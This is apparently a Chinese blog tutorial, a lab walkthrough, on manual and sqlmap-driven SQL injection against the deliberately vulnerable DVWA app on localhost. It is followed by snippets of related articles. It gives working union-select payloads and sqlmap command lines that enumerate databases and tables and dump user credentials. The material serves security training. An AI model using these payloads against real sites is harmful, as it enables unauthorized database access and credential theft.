mysql的sql手工注入基于回显,DVWA中SQL回显注入

最新推荐文章于 2022-08-25 21:34:10 发布
最新推荐文章于 2022-08-25 21:34:10 发布
阅读量305 收藏
点赞数
文章标签: mysql的sql手工注入基于回显

一.SQL注入简介

1.1 SQL语句就是操作数据库的语句,SQL注入就是通过web程序在数据库里执行任意SQL语句。

SQL 注入是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问和修改数据,或者利用潜在的数据库漏洞进行攻击。

1.2 SQL注入漏洞威胁

(1).猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。

(2).绕过认证,列如绕过验证登录网站后台。

(3).注入可以借助数据库的存储过程进行提权等操作。

1.3 基础知识

1.3.1 服务器将提交的参数拼接到要执行的SQL语句中。

一般首先找到有数据库交互的功能页面(例如:?参数=)

正常的SQL语句:select name from tablename where name=’admin’ and passwd=’xxxxxxxxxxxxx’

1.3.2 常用函数:version()  user()  database()

1.3.3 where 语句

... where user_id = 1 or 1 = 1   数字型

... where user_id = ‘1’ or ‘1’ = ‘1’   字符型

... where user_id = “1” or “1” = “1”

1.3.4 三种MySQL注释符

(1) #(忽略),#后面的数据会被忽略掉;单行注释,注意与url中#区分,常编码成%23

(2)-- (忽略),和#类似;注意是:短线短线空格

(3)/*(忽略)*/,多行注释;至少有两处输入;/**/注入中常用来作为空格

二.SQL回显注入(数据库的执行结果直接显示在页面上)

等级 :LOW

1.手工注入

(1)我们可以通过以下步骤判断这里是否存在注入点

输入”1”提交

2b1c879879aaf9d1e144b3d07cc31cee.png

输入“1’”提交 ,会报错

0618ad1710f9a830a06f3c9c21717a92.png

知道这个表单存在注入漏洞

猜测一下这个SQL语句长啥样?

Select firstname,sunname from xxx(表)

Select firstname,sunname from xxx where userid=我们输入的id

(2) 确定查询字段数/测试查询信息列数

1’ order by 1--

1’ order by 10--

(3) 确定回显点

(4) 查数据库名,数据库版本,用户名

' union select version(),database()--

f96b9e1421d9840578f760db2ee39cd9.png

' union select database(),user()--

3807e62c40bc03ab95e52c2fd9d88943.png

爆库名   union select 1,schema_name from information_schema.schemata

(5) 查数据表名

' union select 1,table_name from information_schema.tables where table_schema='dvwa'--

eb77acb6b1f6ebd798287f8db41d33df.png

(6) 查列/字段名

' union select 1,column_name from information_schema.columns where table_name='users'--

(7) 查看字段中的信息

' union select user,password from users--

自动注入(sqlmap)

(1)登录状态--cookie

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=tf2n9lhql5b6851obdb397qqg6"

发现有基于布尔类型的SQL盲注;基于错误回显的SQL注入;基于时间延迟的SQL盲注。

(2) 获取数据库和用户名信息

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=tf2n9lhql5b6851obdb397qqg6" --current-user --current-db

(3) 查询数据库中表的信息

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=tf2n9lhql5b6851obdb397qqg6" -D dvwa --tables

(4) 查询表中字段的信息

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=tf2n9lhql5b6851obdb397qqg6" -D dvwa -T users --column

(5) 查字段信息用户名和密码

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=tf2n9lhql5b6851obdb397qqg6" -D dvwa -T users -C"user,password" --dump

晓琼爱学习
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysqlsql手工注入基于回显_Web安全--SQL手工注入
weixin_27013291的博客
02-11 291
网上有很多关于sql手工注入的教程,但是貌似都不够细,所以今天想写下关于sql手工注入的具体思路,具体以mysql数据库为例。话不多说,首先请不管出于什么目的想要阅读本篇文章的童鞋先阅读一下下面这个:问心:《华人民共和国网络安全法》全文​zhuanlan.zhihu.com好,接下来进入正题:sql手工注入流程:1、判断是否存在注入点(即web网站是否存在sql注入漏洞)1)手注:在原url后输...
DVWA靶场之SQL注入通关详解,2024年网络安全进阶者的新篇章
m0_61068088的博客
04-05 820
判断存在SQL注入后,接下来通过order by语句来猜解字段数。当在输入框输入1’order by 3#时,页面出现不一样的界面,因此这里的字段数有两个。接下来,再通过union select来确定回显位置。如下图所示,回显位置为第二个。获取当前数据库(union select 1,database()),可以得到数据库dvwa
sql注入回显注入
maluxiao123的博客
03-22 3838
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入回显注入需要依靠页面具有数据库查询出内容,使用注入来替换掉本身应该显示的内容来进行攻击的。比如在靶场sqli-labs的第二关页面查询的内容是通过传入的id=2来控制的 当id=0时,数据库没有id=0的内容,所以就不返回任何数据 我们可以看他的后台查询语句 查询了users表
DVWA-SQL回显注入模块 包括代码审计
weixin_45715461的博客
06-01 511
DVWA-SQL回显注入模块 包括代码审计
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3309
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
DVWA进行sql注入
weixin_44901204的博客
08-23 380
1.判断是否有注入漏洞 打开DVWA,在SQL注入输入1,返回正常。 输入1’,报错,返回 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1...
dvwasql injection(low)手工注入笔记
crowsec
04-28 922
首先使用1,2,3,4,5都会返回用户列表然后再使用1'进行判断,发现报错,既知道存在注入漏洞使用语句 1' and '1' ='1 的时候会出现正常:当输入1‘ or '1'='1是,这个式子是个永真式,返回所有结果:分析字段数(两种方法) 方法一:用order by语句。(默认是进行升序的)分析字段数的原因是我们之后需要用unionselect语句来获得我们需要的敏感数据。根据orderby知...
基于错误回显SQL注入整理
12-14
 用我自己的话来讲,基于错误回显sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。  0x01 用于错误...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
sql注入的思维导图。
04-19
SQL注入可以应用于多种数据库管理系统,包括Access、Mysql、Mssql、Oracle、PostsqlSQLlist、MongDB等。然而,每种数据库管理系统都有其特点和差异,例如Access数据库不需要库名,Mysql、Mssql、Oracle等数据库...
sqlmap 自动化的SQL注入工具
01-01
2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 4、支持枚举用户、密码、...
SQL注入分类.ppt
10-27
回显SQL 注入包括布尔型注入、延迟注入等,攻击者无法通过页面的回显结果来判断注入是否成功,需要使用其他方法来判断。 SQL 注入是一种非常危险的攻击方式,需要我们采取有效的防御措施来保护 Web 应用程序的...
DVWA1.9 SQL注入全等级手工注入流程
Wh0ami
12-21 2437
最近想复习一下手工sql注入,下面我将通过DVWA1.9进行一遍手工注入过程。 low 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库的表 6.获取...
DVWAsql注入(一)
ximo的博客
01-21 310
DVWAsql注入(一) 一、低级别 1.输入ID得到回显: 2.判断注入方式: 输入1’ and ‘1’ = ‘1’ # 成功回显: 输入1’ and ‘1’ = ‘2’ # 回显失败: 判断为单引号字符型注入。 3.判断列数与数据回显位置 使用 order by 语句判断列数。 使用 1’ order by 3 # 出现报错: 使用 1’ order by 2 # 成功回显,说明列数为 2: 4.使用 union 联合注入查询,可回显位置并获得当前库 使用 -1’ union select
mysql注入dvwa_DVWASQL注入测试入门
weixin_39517199的博客
02-02 209
目的通过使用DVWA实例理解PHPSQL注入漏洞产生的原理及利用方法,结合实例掌握其过滤方式。原理SQL注入:在用户的输入没有被转义字符过滤时。就会发生这种形式的注入式攻击,它会传递给数据库一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有...
dvwa mysql_error()_DVWA学习之SQL注入
weixin_29661407的博客
02-10 169
DVWA学习之SQL注入环境工具dvwa 1.9phpstudyfirefoxburpsuite实验步骤一、设置安全级别为LOW1. 登录DVWA,并将安全级别设置为LOW2. 进入SQL注入模块,并输入1,返回结果如下3. 下面判断注入类型是字符型注入还是整数型注入字符型注入SQL语句形如select * from xx where id='$id'整数型注入SQL语句形如select * ...
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1645
DVWAsql注入漏洞-low
SQL注入详细入门笔记一(DVWA)
陆总的博客
08-19 1222
SQL注入笔记 目标:拿到表登录用户账号密码; [注意:]全过程sql语句的单引号都应该是英文输入法下的单引号; 入口 检测能否进行sql注入:输入单引号,点击提交报错 使用参数1’ or 1=1;#进行注入可以得到当前表下所有信息 可以通过1' or 1=1 order by 2;# (或9、8、7、6。。。依次尝试)判断出查询范围的字段个数; 5、通过这里基本可以推断出后台支持的sql语句结构为:SELECTfirst_name,last_name...
【无标题】DVWA sql注入 报错问题
weixin_50339521的博客
08-25 784
dvwasql注入报错问题
sql注入如何判断回显
最新发布
04-26
SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据插入恶意的SQL代码,从而可以执行未经授权的数据库操作。判断SQL注入回显位的方法主要有以下几种: 1. 错误消息:当注入SQL语句存在错误时,数据库可能会返回相应的错误消息。攻击者可以通过观察错误消息来判断是否存在注入漏洞。 2. 布尔盲注:攻击者可以通过构造特定的SQL语句,利用数据库的布尔逻辑判断来判断回显位。例如,通过构造一个条件语句,根据返回结果的真假来判断是否存在注入漏洞。 3. 时间盲注:类似于布尔盲注,但是攻击者通过构造特定的SQL语句,利用数据库的时间函数来判断回显位。例如,通过构造一个延时操作,根据返回结果的延时时间来判断是否存在注入漏洞。 4. UNION注入:攻击者可以通过在注入点使用UNION语句,将恶意查询的结果合并到正常查询结果。如果回显位发生了变化,说明注入成功。 5. 报错注入:攻击者可以通过在注入点使用SELECT、INSERT等语句,并故意构造错误来触发数据库报错。观察报错信息可以判断是否存在注入漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值